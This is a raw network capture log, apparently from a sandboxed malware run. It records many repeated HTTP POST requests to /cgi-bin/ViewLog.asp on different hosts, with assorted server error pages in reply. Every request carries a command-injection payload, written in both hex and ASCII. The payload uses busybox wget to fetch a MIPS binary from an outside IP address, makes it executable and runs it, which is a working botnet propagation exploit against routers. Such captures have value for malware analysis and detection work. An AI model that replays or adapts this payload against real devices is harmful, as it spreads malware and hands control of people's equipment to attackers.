                                              Nov 23, 2023 05:17:12.742367029 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.894232035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              286192.168.2.134103294.187.110.528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:27.162753105 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              287192.168.2.133536231.40.225.1578080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:27.163992882 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.383867025 CET1340INHTTP/1.0 400 Bad Request
                                              Server: squid/3.1.23
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 03:47:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 3167
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              288192.168.2.135721094.122.15.748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:27.212284088 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              289192.168.2.135665094.75.238.88080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:28.634334087 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              290192.168.2.134667285.122.216.178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:28.668054104 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              291192.168.2.136067885.187.5.2008080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:28.682140112 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.920670033 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:16:28 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              292192.168.2.133881694.120.7.428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:28.682750940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              293192.168.2.133975494.120.242.1918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:28.695157051 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              294192.168.2.134283262.210.102.1688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:28.810204983 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.986124992 CET261INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Thu, 23 Nov 2023 04:16:28 GMT
                                              Content-Length: 19
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              295192.168.2.135083462.195.2.2538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:28.868021011 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:29.074388981 CET590INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:28 GMT
                                              Server:
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              296192.168.2.135293431.199.88.1238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:28.873668909 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:29.079775095 CET401INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:16:28 GMT
                                              Server: Boa/0.94.14rc21
                                              Accept-Ranges: bytes
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              297192.168.2.133411095.68.20.1898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:28.875801086 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              298192.168.2.134939485.122.217.788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:28.888938904 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
